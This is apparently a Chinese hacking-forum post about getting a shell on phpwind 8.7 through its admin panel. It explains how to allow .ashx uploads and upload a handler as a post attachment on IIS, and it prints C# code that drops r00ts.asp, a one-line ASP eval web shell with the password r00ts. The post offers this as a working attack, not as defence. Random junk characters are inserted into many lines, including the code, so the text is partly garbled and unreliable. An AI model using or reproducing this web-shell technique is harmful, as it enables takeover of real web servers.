phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

. b* @& ^; U0 M2 e( ~- }群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 p  z% d) `% t  G$ \8 ~
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
7 Y4 F1 v3 O! y
8 X5 L5 _1 ?- n; o# _3 ?2 x& }然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
$ \1 m$ ]. E! i7 r& W
* c$ M( g- E- c" x, ^打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

6 R' p$ m, G8 g; }下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
- O( V1 G3 c) d- iusing System.IO;
1 y2 v) `0 t# C3 m/ epublic class Handler : IHttpHandler {
8 {, H; v$ p  ~. `9 b) V5 _9 upublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
1 x/ Y+ }: R2 G4 e8 oStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
, p& Y; m+ B  k7 K* z1 q2 Gfile1.Write("<%eval request(\"r00ts\")%>");
, {. S" }4 f( C( ?. Q2 zfile1.Flush();
, V' ^: [0 S; q- k( Y7 D) x. kfile1.Close();
) S! W$ q* s% T. N2 c: t! o3 s}
* R: y! u( U5 r) p7 I4 h" \- B8 ?. Hpublic bool IsReusable {
get {
return false;
}
}
}